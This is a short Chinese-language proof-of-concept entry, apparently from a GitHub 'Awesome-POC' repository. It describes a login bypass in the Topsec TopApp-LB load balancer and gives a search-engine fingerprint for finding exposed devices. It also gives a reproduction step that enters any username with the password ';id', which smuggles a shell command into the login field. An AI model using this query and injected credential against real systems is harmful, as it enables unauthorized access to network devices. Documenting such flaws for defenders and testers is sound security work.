Awesome-POC/Web应用漏洞/天融信 TopApp-LB系统 任意登陆.md
2023-08-28 15:55:36 +08:00

33 lines
446 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 天融信 TopApp-LB系统 任意登陆
## 漏洞描述
天融信负载均衡TopApp-LB系统无需密码可直接登陆查看敏感信息
## 漏洞影响
```
天融信负载均衡TopApp-LB
```
## 网络测绘
```
app="天融信-TopApp-LB-负载均衡系统"
```
## 漏洞复现
在登录页面中输入,账号:**任意账号** 密码:**;id**
![](./images/202202091919361.png)
成功登录
![](./images/202202091919022.png)